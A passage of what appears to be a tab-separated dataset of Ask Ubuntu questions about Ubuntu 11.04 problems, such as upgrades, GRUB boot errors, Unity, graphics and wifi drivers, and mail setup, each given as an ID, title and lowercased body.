however : package nspluginwrapper is not configured yet . dpkg : error processing flashplugin-installer ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : nspluginwrapper flashplugin-installer
37948	how to run a command with no-tty access , to run in admin privileges ?	i would like to execute a command with administrative privileges , but do not have an access to the tty . i tried to execute it with the -a option of the sudo command and setting the environment variable sudo_askpass=/usr/bin/gksu . to do the same i ran the command as following env sudo_askpass=/usr/bin/gksu sudo -a _root-privilage-cmd_ but i got the gksu window , which would not authenticate me ...
37949	pulseaudio makes static after upgrade to gnome 3	since upgrading my natty install to gnome 3 , i 've been having occasional issues with sound . most of the time , sound works fine , but here and there it will be really staticy . one cause i 've noticed is when the cpu is heavily tasked , this will cause sound to get staticy . sound then remains staticy and garbled even after tasks finish and cpu usage drops to normal . forcing pulseaudio to restart ( with `` killall pulseaudio '' ) seems to fix the issue for that instance . the more annoying cause of staticy audio has been running certain games . it happens 100 % of the time when these games are running . linux-native game trine is really bad , with the sound issues making the game completely unenjoyable . warcraft iii running in wine also does it , but to a lesser extent . these games both ran perfectly before the upgrade to gnome 3 , and i 'm confused as to why it would change anything . after searching a bit , the only ( remotely ) similar thread ( crackling audio with pulseaudio ) i 've found says that it could be `` bad latency and incorrectly set frequency settings in pulse audio '' . if it were something as simple as incorrect frequency settings in pulseaudio , where would one go to change it ? any help , input , or other assistance is greatly appreciated . thanks .
37954	detect internet connection	on windows , if there 's no internet connectivity for whatever reason and the connection to the network is perfectly fine , a small icon shows on the network icon in the notification area . is there any way to do the same on ubuntu ? even that is not necessary , i just want to know what ways are there to find if the internet connection is lost or not . no ping to x website please , i 've faced a few instances of dns outage and ping failure can be due to dns down time , not internet connectivity . update thanks for all those interesting answers . my actual aim of this question was to know if there was a method to know the status of my connection at the local level ( connection between the machine and ap ) , which is why i said no ping to x website please . the lan private address that was mentioned by alain is something that comes close . if i can diagnose that , i can rule out ap/network issues , then move onto diagnosing the actual connection to my isp .
37955	getting error on synpatic package manager , ubuntutweak on the repository and ubuntu software center	everytime i tried to open synpatic package manger i get this : e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/the-board-team-dev-snapshots-natty.list e : the list of sources could not be read . go to the repository dialog to correct the problem . e : _cache- > open ( ) failed , please report . i removed the the-board-team-dev-snapshots-natty from ubuntu software center but still get the same error ubuntutweak : e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/the-board-team-dev-snapshots-natty.list e : unable to lock the list directory ubuntusoftwarecenter : e : type 'ain ' is not known on line 1 in source list /etc/apt/sources.list.d/the-board-team-dev-snapshots-natty.list
37957	how do i manage applications on startup in gnome 3 ?	i had a nice gui for changing startup applications ( after logging in ) on gnome 2 . how can i start that application on gnome 3 ? where can i download it ? what is the package name ? what command is used to launch it ? i have pidgin still launching on start , but i have converted back to empathy , so i would like to know how i can remove pidgin and start empathy instead .
37961	how do i set-up three monitors with two graphics cards ( 3d acceleration enabled ) in unity ?	i have looked at : how does /will unity handle multiple monitors ? - > only two monitors with twinview how do i get three monitors working ? - > each monitor uses a seperate x screen + xinerama ( no 3d acceleration - > no unity ) my current setup looks like this : two monitors in twinview + one monitor as a seperate x screen ( it is not a problem that i can not move windows from that monitor to the other two , i used to work like this on ubuntu 10.10 ) . the problem with this is , that i am unable to start applications on the seperate x screen and when i manage to open a terminal on there , i am unable to interact with it ( no window decoration ) . i can still use my setup with the gnome session ( ubuntu classic ) , so i am not urgently looking for an answer , but i would like to know if it can be done and hopefully learn something in the process . edit : i should probably mention that i have two nvidia graphics cards in my computer . and that i am happy with the solution that i am currently using with gnome ( i. e. twinview + seperate x screen ) . this wo n't work with unity as i do n't know of a way to launch applications on the seperate x screen .
37963	how can i report key binding bug into launchpad ?	i think that setting key bindings in separate applications is bug ( link ) . how can i report this bug , if : pressing `` report bug '' in launchpad sends me to documentation page i do n't know what application to report bug against starting ubuntu-bug as suggested in documentation and choosing `` other '' do n't help also , because ubuntu-bug program just tell me that i should specify pid
37965	is there a program that can make your mouse pointer jump to the next monitor ?	i use multiple monitors ( with synergy ) , and i 'd like to make the mouse pointer jump over to the next monitor without having to move it . yes , i am that lazy . does a program that does something like this exist ?
37969	local file system not properly unmounted during shutdown	i have a file system with two hdds and several partitions mounted separately locally . /root , /home , /usr , /var , /local/share , /home/bernhard/fotos/bilder , /backup are on separate partitions and are all `` ext3 '' . during unmounting the message `` unmounting local file system '' does not appear any further and when booting all partitions but the root partition have to reload the journal , which indicates improper unmounting . the root partition and /usr are on sda , the others on sdb or further usb-mounted devices . the only partition unmounted w/o problem seems to be the root partition on sda4 . i wonder whether the script to umount all devices has a `` wait for success '' loop or that the script itself got corrupted . however , yesterday i upgraded to 11.04 and the error persists . pmount does not look to be appropriate since the device are not hot-plugged but simply mounted during system start . obviously mounting /usr and afterwards /usr/local/share as well as /home and later /home/bernhard/fotos/bilder presents problems for umount ; the devices may be busy and thus not properly unmounted . does anybody have an idea for a script to organize unmounting in an ordered way ? how to wait for unmounting of the secondary mount ? do you know as well where to place such a script that it will be used instead of the original umount command ? could be a general solution .
37972	diagnose brightness control	brightness control on my laptop does not work , how can i diagnose if it 's unsupported , or a bug ? and if it is a bug , what do i include in the bug report ? update thank you for all the responses , specially @ guandalino for the bounty . but unfortunately the laptop in question is no longer functional due to an accident involving water . and as such i can not actively participate and try the out the potential solutions . those still interested in this question , please participate in this discussion at ask ubuntu meta .
37975	black screen after upgrading natty	i have upgraded the new released natty today but after restarting i got black screen i have reinstalled the grub using live cd i have copid xorg file from /usr/share/x11/ from another computer none of this solved the problem . is there any solution for this ?
37986	change home folder in natty	just now i made a fresh installation of natty on my desktop . earlier i was using maverick with a separate home partition . while installing i selected / for maverick partition and selected nothing for earlier home . now i noticed that earlier home is recognized as just another partition and a new home has been created . how can i set earlier home as home for natty ?
37987	how do you navigate without a windows key ?	some laptops ( such as thinkpads ) do n't have a windows ( super ) key . how should users navigate unity on such computers ?
37999	what is different about the mac iso image ?	http : //cdimage.ubuntu.com/releases/11.04/release/ at that location there is an iso image which is described as `` this image is adjusted to work properly on mac systems . '' what specific problems on the mac does this image address that the standard images do n't ? i ask because i need to know which iso to recommend to apple mac users .
38005	what happens with windows applications installed via wine during upgrades ?	in this case i specifically want to go from 10.10 to 11.04 , but maybe there are some generic descriptions out there as well . what should i expect to encounter with a program which works great under wine right now after a version upgrade ? i understand that there is no way to say for sure , i 'm just hoping to include the likely hood of results in my considerations if there is good evidence . will it be uninstalled , are the odds with me that it will continue to run ok , or is it more likely to end up a broken install ?
38009	how do i remove the unity launcher ?	how can we remove the launcher that come with unity on this new ubuntu version ?
38014	crashed during remastersys session , all data in home seems lost , what can i do ?	i was trying to backup to a live bootable cd and then the system crashed ! modded loading screen is still present programs are there , but gnome is back to 0 and all the data i had under docs seems to be nowhere to be seen . music , download etc are empty ! help !
38016	how do i force unity to not use compositing ?	unity 3d is incredibly unstable for me . still , i love the interface and would like to continue using it . is there any way to force unity 2d ? btw : i 've already filed a bug report against xserver-xorg-video-ati
38017	how do i read cpu temperatures on a phenom ii processor ?	i am trying to measure the temperature of the cpu cores on my latest ubuntu 11.04 install with kernel 2.8.32 to no avail . i have followed the instructions at https : //help.ubuntu.com/community/sensorinstallhowto to configure lm_sensors and ensured that the k10temp kernel module is installed . after running sensors-detect and everything , the output of sensors is just : $ sensors k10temp-pci-00c3 adapter : pci adapter temp1 : +28.2째c is there a way to get more detailed information about the temperature of the cpu cores ?
38020	remap window shortcuts for use on a laptop	i 've looked through the compiz settings , but since i am on a laptop , i ca n't use the numpad shortcuts for window placement . how can i remap this to be something like super-left , super right , super-right-up , etc ?
38021	how to add a ppa on a server ?	the server version of ubuntu does not have the add-apt-repository command . how can i add a ppa to the server without this command ?
38024	how can i change the default unity keyboard shortcut ?	i installed ubuntu 11.04 and it works fine . but i have a little problem . i need to use a software named putty , because another software depends on it . my problem is that this software uses f10 as a shortcut to a function but unity intercepts , then i can not access this function . how i can change this shortcut at unity ? thank you and sorry for my english , i 'm brazilian . marcelo nunes .
38026	will libreoffice 3.4 be included in an update ?	ubuntu 11.04 ships with libreoffice 3.3.2 in a few weeks libreoffice will publish a new version libreoffice 3.4 will ubuntu release this update like a new version of firefox ? ( a few days after the release ) or : similar to openoffice ? ( more or less never )
38027	ubuntu does n't start anymore after upgrading 11.04	i updated ubuntu 10.10 to 11.04 but ubuntu does n't start i tried to follow these : instructions but it did n't work because i could n't enter the thing he called `` grud mode '' so i reinstalled -- purge fglrx and now if i start my computer there is a lot of text like : setting sensors limits [ ok ] ... and there is on line : stopping automatic crash report generation [ fail ] my computer is a sony vaio vgn-fw11j can anyone help me ? thanks a lot here 's a picture of my laptotp : after a long search and a modification in the grub data , i can access it , but does this help me ?
38028	performance being really choppy with ati drivers	i just updated to the latest version ( 11.04 ) yesterday , and ever since then , the system has been really choppy . i used to have 10.10 installed , and that was running smooth . anyone also experiencing this ? any fixes ? i 'm only running chrome and netbeans ...
38043	system freeze caused by ath9k driver	i have had this issue with 10.04 , 10.10 , but i was able to solve it by custom compiling the driver from recent sources . and i had to re-compile , very painfully , whenever there was a kernel update . and both versions of ubuntu did not have the ath9k driver by default . but with 11.04 it looks like nothing can be made to work . natty installed the driver by deafult , and it froze my system when i turned on the wireless . i compiled and installed from the recent versions , still the system froze . i installed the .deb i created with 10.10 ( which had worked there ) , again the system froze . i again compiled from the older sources from which the 10.10 working .deb was created , again the system froze . i usually put my netbook on master mode ( as an access point ) to share the internet connection my family members . from now on , untill a solution is found , we all have to fight for the single ethernet cable to the modem . edit1 : i directly logged in to cli , without logging in to gui . in the cli , when the system froze , `` kernerl panic '' was shown , and near it there were ath9k errors too . however , the error did not get logged at /var/log . edit2 : same issue with ubuntu 11.10 too . the moment eth0 and wlan0 are bridged ( with hostapd ) the system freezes . and the freezing happens only if i enable wireless master mode . even after googling for hours , i was not able to solve the issue .
38059	mouse configuration - where to configure special mouse button to perform some compiz actions ?	i 've updated to 11.04 and i now need to reconfigure a lot of things . one of them is the mouse `` special `` buttons . before i clicked on the red button that my mouse brings , and i switched desktops . i tried to do that again , but on the compiz configuration we can see this useless information like : button1 button2 button3 button4 and so on ... i have no clue about what number is associated with my red button of this microsoft optical comfort 3000 mouse . where can i configure mouse buttons/clicks ?
38061	ring switcher in unity	in classic gnome2 desktop i could install compiz and customize it with compiz config settings manager so that clicking on a specific screen location allowed switching between open windows . with unity can i do the same or alt + tab is the only option ?
38062	monitor cpu usage in unity	back when i used gnome-panels , i really liked the system monitor applet . it let me keep an eye on both my processor and bandwidth , it was light , and it was native . is there a way to achieve this with the current unity interface ? that little graph was useful in many ways . i could spot misbehaving processes , i could tell when a download finished , i could tell when an update finished , etc . i 'm not looking to install screenlets or any fancy stuff , i 'm already running unity 2d because this netbook is n't that tough . i 'm looking for something that shows me a little graph of real-time cpu usage ( and bandwidth , if possible ) , it needs to be permanently visible and it needs to be light .
38064	resizing a window freezes the entire system	i have just installed natty on an intel celeron single core cpu with 1 gb ram without a 3d graphic card and natty is running on classic desktop instead of unity . i have to force turn off and restart the computer system to recover . maximizing , minimizing and restoring do not freeze the system . only when i tried to click and drag the border to resize my computer system freeze with the window having a orangy tint . otherwise natty run along nicely for now .
38067	screen turns black when plugging in a second monitor	i 'm running 11.04 on a 2011 13 '' mackbook pro ( intel hd 3000 gpu ) . previously everything had been fine , but today when i plug in an external monitor ( 17 '' acer being plugged in via a mini display port to vga adapter ) the laptop immediately recognizes the monitor , but the screen turns black . it seems that everything is still responsive . i can see the cursor and i can see it change as it moves over things like text boxes or the edges of open windows . but even after unplugging the monitor , i ca n't get anything but a black screen until i restart gdm . yesterday i was using the laptop with a 22 '' asus monitor using a mini display port to dvi adapter and everything was fine . this same monitor was also working fine last week when i was running os x , and on an older hp laptop without an adapter ( straight to vga ) . how can i fix this ?
38071	information on package versions from old releases ?	the http : //packages.ubuntu.com/ site provides great information on packages , with changelogs and much more , but only covers currently supported releases . the rmadison program ( devscripts package ) will also give me command-line access to all versions of a package from currently supported releases ( nice ! ) : $ rmadison gnome-mount gnome-mount | 0.8~svn20080225-0ubuntu4 | hardy | source , amd64 , i386 gnome-mount | 0.8-2ubuntu1 | karmic/universe | source , amd64 , i386 but i do n't see a way to find e.g . what version was in intrepid , which is no longer supported . i know the intrepid release is available at http : //old-releases.ubuntu.com/ but i do n't want to have to go through each repository by hand .
38074	ignoring a complete thread in a mailing list	i am subscribed to a couple mailing lists , but there are some topics i am not interested in . thunderbird groups topics nicely in threads , but always highlights threads with new answers . when i delete a thread , new messages continue to come in but are just unbundled without the initial question , that is even worse . is there some way to ignore a thread and all follow-up ?
38077	using gvim as editor for thunderbird	can i somehow use gvim to compose my email messages in thunderbird ?
38078	enabling compiz disables windows title bar - why ?	ubuntu 11.04 here . i have compiz fusion icon . when i choose compiz , to benefit from the effects , my windows title bar disappear . how can i make it appear , and preserve the effects ? note : if i go to compiz fusion icon > select windows manager > metacity i got the tittle bar but not the effects . if i go to compiz fusion icon > select windows manager > compiz i got the effects but not the title bar . thanks
38081	how would one install a side by side installation of python 2.x , and python 3.x	i think the title says it all .
38082	how do i manually boot from the grub prompt after do-release-upgrade ?	i read a couple of other questions on this topic and they both pointed to the grub2 community documentation and installing grub configs from an install disk . i had some trouble with the documentation , so here 's where i am . this may be complete pebkac . i have two guests sitting on an ubuntu 10.04 server virtualized under kvm , both were initially running 10.04 . i used `` do-release-upgrade '' to update to 10.10 without a hitch on both boxes , rebooted , and then ran `` do-release-upgrade '' to update to 11.04 on both boxes . in my haste , i ignored the errors about missing grub configurations . when i restarted the guests , naturally i 'm presented with a grub prompt . issuing `` boot '' yields `` error : no loaded kernel '' . here 's ls output for the root partition : when following the manual boot guide , i ca n't get the options straight either using `` ss928-root '' or `` hda0,1 '' as the root filesystem . most everything gives the `` file not found '' error . issuing `` ls '' on both of those filesystems show several options for vmlinuz and initrd.img . these guests are using lvm if that helps any . edit i 've gotten a little bit further . the following command sequence : yields the following screen ( after scrolling through quite a bit of text ) :
38083	initramfs problem when out of disk space	i just upgraded from 10.10 to 11.04 . during the upgrade process , it said there was a problem setting up initramfs-tools and i needed to do sudo dpkg -- configure -a so once i got 11.04 started for the first time , i did that . this is the output . setting up initramfs-tools ( 0.98.8ubuntu3 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-2.6.38-8-generic gzip : stdout : no space left on device e : mkinitramfs failure cpio 141 gzip 1 update-initramfs : failed for /boot/initrd.img-2.6.38-8-generic dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools after searching around , it seemed like this was a problem of insufficient space in my /boot partition . it is only 100 mb and this has never been a problem before , but despite deleting all but the latest kernel i still get the same message .
38084	nautilus shortcut for new blank files ?	just like ctrl-shift-n for folders . is it possible ?
38087	what 's the best way to implement a script for tiling windows ?	i just upgraded to ubuntu 11.04 , and i am looking for a good way to tile windows . what i need is just to move window to the left or right half side of the screen , and bind the actions to some keyboard shortcuts . for instance move-window-to-display.sh contains # ! /bin/bash if [ $ 1 -eq 2 ] then pos= '' 950 0 '' size= '' 967 1031 '' else pos= '' 0 0 '' size= '' 965 1031 '' fi xdotool windowmove `xdotool getwindowfocus` $ pos xdotool windowsize `xdotool getwindowfocus` $ size exit 0 then `` . move-window-to-display.sh 1 '' moves the window to the left and `` . move-window-to-display.sh 2 '' to the right . however , this code works but not perfectly , because of xdotool i guess , anyway it is not easy to put the windows at the exact position that we want . so does anyone have a better way to do this ? either by shell or by other tools ... i tried tiling window manager like xmonad , but it seems too complicated to use ... thank you very much
38088	can not tether iphone under ubuntu 11.04	i 'm trying to connect to the internet via my iphone ( ubuntu 11.04 32bit ) . i installed all necessary packages ( ipteth-utils , ifuse , libimobiledevice , usbmixd , gtkpodâś ) after that i connect my iphone to computer , trying to connect to iphone network but it is not happening . i did not have this problem in previous versions ( 9 ... .10.10 ) , and i know other people with the same problem .
38090	sendmail does n't shoot off email when i end the message	when i try to send email with sendmail like so : sendmail example @ example.com hello . . the program does n't exit when i enter the final line with the dot ' . ' only , like it should . i have n't configured sendmail at all , but i would feel that it should work since it just uses dns to resolve where to open smtp connections . what am i missing ?
38091	is there a free option for playing wma files ?	any free codecs out there to get my wma files playing on rhythmbox ? ( 11.04 )
38096	make recipients field of thunderbird just one line high	whenever i compose a message in thunderbird , there is room for four recipients , but i usually only use one . is there some way to make this field smaller ?
38101	btrfs - unknown filesystem ?	today when i went ahead with natty installation i had selected btrfs for root filesystem . to my utter surprise i was presented with the screen unknown filesystem grub rescue > none of the options i tried like y , yes did not work . later i again installed natty with ext4 filesystem . why do such errors appear ?
38106	using dns lookup in chroot postfix	i 'm trying to set up a postfix set up on my client machines . all machines should use a central ldap directory for common postfix ( e.g . aliases , etc ) . but since postfix runs in chroot postfix is unable to resolve the hostname of the ldap server . postfix mail.log lines : apr 30 13:37:22 host postfix/cleanup [ 30160 ] : dict_ldap_debug : ldap_connect_to_host : tcp ldapmaster.domain.com:389 apr 30 13:37:22 host postfix/cleanup [ 30160 ] : dict_ldap_debug : ldap_connect_to_host : getaddrinfo failed : name or service not known apr 30 13:37:22 host postfix/cleanup [ 30160 ] : dict_ldap_debug : ldap_err2string apr 30 13:37:22 host postfix/cleanup [ 30160 ] : warning : dict_ldap_lookup : search error -1 : ca n't contact ldap server apr 30 13:37:22 host postfix/cleanup [ 30160 ] : warning : af28b226a2 : sender_canonical_maps map lookup problem for root @ domain.com when i do the ldapsearch manually it works fine . i also tried to enter the chroot environment of postfix ( /var/spool/postfix ) and when i try to ping ldapmaster.domain.com i get an unknown host-error . the issue has been reported to ubuntu launchpad as dns hostname lookups fail in chroot after natty upgrade . any ideas how to allow postfix to resolve the dns names ?
38108	how to change directory at the end of a bash script ?	in my .bashrc : function rnew { $ home/.dotfiles/railsnewapp.sh $ 1 ; } essentially , i call rnew from any directory , and it creates a directory in ~/code/appname , installs rails into it , and then i want the pwd to become ~/code/appname . in ~/.dotfiles/railsnewapp.sh : # ! /bin/bash appname= $ 1 appdirectory= '' $ home/code/ $ appname '' if [ -d $ appdirectory ] ; then echo $ appdirectory already exists . not creating rails app $ appname . else mkdir $ appdirectory cd $ appdirectory if [ `pwd` == $ appdirectory ] ; then echo `` rvm use 1.8.7 @ $ appname '' > > `` $ appdirectory/.rvmrc '' rvm gemset create $ appname cd .. rails new $ appname -m $ home/code/config/base_template.rb -t -j cd $ appdirectory if [ `pwd` == $ appdirectory ] ; then git init . else echo could not create git repo in $ appdirectory . could not switch to that directory . fi else echo could not switch to directory $ appdirectory . no creating rails app $ appname . fi fi # # # # # # # # how to switch to $ appdirectory here so that # # # # # # # # when the `rnew` function completes and i 'm back at the # # # # # # # # terminal and the `pwd` is $ appdirectory ? ps . i do not want to do a cd in rnew . as you can see in the script , i am making sure that the app is created in the correct directory and other checks related to directory , so i do n't think i can call the script from rnew for a directory that is yet to be created ?
38112	how can i open a .dmg file ?	i 've got a .dmg file , and i ca n't figure out how to open it . how can i open it ?
38113	boot error after upgrading to 11.04	i had two systems who worked perfectly : ubuntu and windows 7 . today i just upgraded ubuntu to 11.04 . now while booting , after choosing `` ubuntu '' , there is an error who appears and disappears quickly , it looks like : '' try ... ntfs5 ... error '' sorry that i could not catch the exact whole sentence . it does not seem that the error hurt the system because afterwards everything works fine . but its existence still annoys me ... does anyone know what it is about ? does anyone know how to solve it ? thank you very much !
38117	battery life decreased after upgrade to 11.04	after upgrading from ubuntu 10.10 , my battery life has decreased dramatically . there was a bug in ubuntu 10.10 where the load balancing tick and kworker would interrupt and wake-up the cpu too much , and this was n't normal . i applied a gnome-power-manager fix back then , following this question , which leads to this bug report , and battery life increased to 3.5 hours . i 'm getting around two hours of battery-life in natty , and calling intel 's powertop reveals that this bug is back . is there a fix for natty yet ? i have a core 2 duo ulv , thinkpad edge 13
38119	how do i disable tcp window scaling ?	tcp window scaling is part of rfc1323 - tcp extensions for high performance i 'm on ubuntu 10.10 at the moment . for an immediate effect i have run the following : sudo sysctl -w net.ipv4.tcp_window_scaling=0 for a more lasting effect : sudo sh -c 'echo `` net.ipv4.tcp_window_scaling=0 '' > > /etc/sysctl.conf' is there a better or perhaps more user specific way to disable either all of rfc1323 or specifically disable tcp window scaling on ubuntu for all outgoing requests from the machine ? for related information why i am doing this , see this serverfault answer for my situation .
38123	apt-get update : failed to fetch ; unable to connect to launchpad	like 3 hours ago when i type sudo apt-get update my repositories update just fine , but now i get these messages : err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty inrelease err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : err http : //ppa.launchpad.net natty release.gpg unable to connect to ppa.launchpad.net : http : reading package lists ... done w : failed to fetch http : //ppa.launchpad.net/adilson/experimental/ubuntu/dists/natty /inrelease w : failed to fetch http : //ppa.launchpad.net/alexeftimie/ppa/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/am-monkeyd/nautilus-elementary-ppa/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/chromium-daily/dev/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/elementaryart/elementarydesktop/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/zeitgeist/ppa/ubuntu/dists/natty/inrelease w : failed to fetch http : //ppa.launchpad.net/adilson/experimental/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/alexeftimie/ppa/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/am-monkeyd/nautilus-elementary-ppa/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/chromium-daily/dev/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/elementaryart/elementarydesktop/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/ferramroberto/java/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu/dists/natty /release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/nilarimogard/webupd8/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/pidgin-developers/ppa/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/tiheum/equinox/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/zeitgeist/ppa/ubuntu/dists/natty/release.gpg unable to connect to ppa.launchpad.net : http : w : some index files failed to download . they have been ignored , or old ones used instead .
38124	why is this item showing up in the software center when it does n't exist ?	here is an item in the software center : here is what happens when i click `` more info '' : why is it showing up if it does n't exist ?
38126	how to redirect output to screen as well as a file in a yet-to-be-created directory ?	my aim is to log all output from a script into a directory that the script is going to create . for example , i have : ~/.abc.sh : # ! /bin/bash rails new myapp when i run ... cd ~/code . ~/.abc.sh ... that will create a new rails app in directory ~/code/myapp . when rails is creating an app , it outputs a whole lot of text that i want to capture and store in a log file in the same directory the rails command newly created . i also want to display that text in the terminal as well . how do i go about doing this ?
38129	in unity everything running on gnome freezes	i start using the terminal or nautilus and they freeze ( all the apps ) , the program works , but the interface is freeze , i pass my mouse on the terminal , in ccm and is freezed but the cursor act like is not freeze . i had an ati hd 4350 with catalyst 11.4
38130	personal file sharing error , ca n't find webdav package	i want to share files from my ubuntu laptop to my mac pro ( mac os x ) , my question is , what do i have to install to be able to use this program ? i tried to install `` webdav '' but i could n't find it . ( sudo apt-get install webdav ) i looked in the help section for more info but nothing there helped me .
38131	time/date indicator does n't appear in the panel	i have upgraded to ubuntu 11.04 ( natty ) and now the date/time does not show up in the app indicator area in the top panel . i know that quite a few of the applets/indicators no longer work in natty , but surely the date/time does as it 's part of ubuntu itself . any ideas on how to get this back ?
38133	asus 1215n gpu driver/s do n't give me a `` full '' os experience	i 'm use to not having specific drivers from a manufacture on my laptop when running a linux os and that has always been fine - there 's been adequate foss drivers for my needs and it has n't ruined any of my os experience . when i bought an asus 1215n one of the upsides to the hardware seemed to be the switchable gpu that could give lots of performance or lots more battery life and would switch on-the-fly ... with windows of course . seems that the nvidia driver are crap and people advise not installing them . i have some sort of workaround for vga_switcharoo ( ? ) and the on-the-fly nature of the gpus has turned in to a manual one : ( the worst bit though ( aside from shorter battery life ) is the web experience with html5 . if i visit mozilla 's web o'wonder site i 'm told i do n't have webgl working due to driver issues . this really blows - is it possible that proprietary drivers can now ruin my web experience too ? !
38136	ca n't change backlight brightness in asus ul20a	i have asus ul20a and what i think is the newest netbook version of ubuntu , and i ca n't seem to find a way to change my screen 's brightness . it 's a shame , because it takes hours off my battery life . googling offered an answer : upgrade my bios to 210 . the thing is , my computer does n't have a cd slot . so how can i upgrade my bios , or is there another way to change my screen brightness ? i have already tried tweaking lines in grub and xbacklight , so they do nothing .
38141	use the whole speed of my core 2 duo in natty	i note my computer sometimes runs unity slow , but i cant use the cpu applet of gnome panel , for the restriction in natty 's panel . is there a way , to tell the system to use the whole 1.86 ghz of speed ? , both cores work independly .
38143	ralink 5390 card in laptop does not work after installing driver	i recently bought a hp g62x laptop for myself . it sports a decent core i3 processor , 4 gigs of ram and a 500gb hdd . it also came with wireless-n , a real bonus because i am using a wireless-n router . the wifi chipset is a ralink 5390 . it came preinstalled with windows 7 , and everything works fine in there ( obviously ) . i then proceeded to install ubuntu 10.10 x64 a few days ago ( this is before natty came out ) and everything worked . . . except wlan . so i plugged in via ethernet and went looking and found that i clearly was n't the first to discover this issue . i found a guide here that i followed to download the ralink linux driver ( which is stated to support my chipset ) , configure , compile , and install . everything went perfectly , i restarted ; lo and behold , i have a list of access points . i went to connect to mine , entered the password , and now the animated `` wifi wave '' logo keeps going indefinitely until you click it , and it freezes for a few minutes . it will unfreeze if you let it sit but clicking it causes the same freeze again . i could n't really care less about a wifi icon freezing , but a . ) it freezes everything else in the system up , not just the icon , and b . ) it never actually completes the wifi connection . anyone knowledgeable in fixing issues like these that has an idea what to do , i would really appreciate it ! i really , really do n't want to be forced to use windows because of a crappy wifi driver ! since natty came out i installed that and i ca n't even compile the driver without fatal errors , so i reverted to 10.10 and everything is the same as it was before . note that this is a clean ubuntu 10.10 desktop edition 64-bit install , nothing updated/modified/changed besides ( attempting ) to install this driver .
38144	video not working properly on an integrated intel 82865g card	i hav a fairly old computer ... a p4 with hyper threading technology ... 1.5gb ram , 64mb onboard graphics ... i did a clean installing erasing the old 10.10 . the normal ubuntu mode says that the graphics is n't enough . in ubuntu classic mode , neither of the panels appear and when i take the mouse pointer in that area , it just appears for a moment and disappears . in ubuntu classic no effects mode , it boots , but the panels are distorted and for the first time in my life , ubuntu hung ... i 'm a huge fan of ubuntu and its ability to work on almost any config but this really upset me ... please help ... is something wrong with my installation or is it a driver problem ? this is my video card : '' 00:02.0 vga compatible controller : intel corporation 82865g integrated graphics controller ( rev 02 ) '' its a intel on board graphics controller
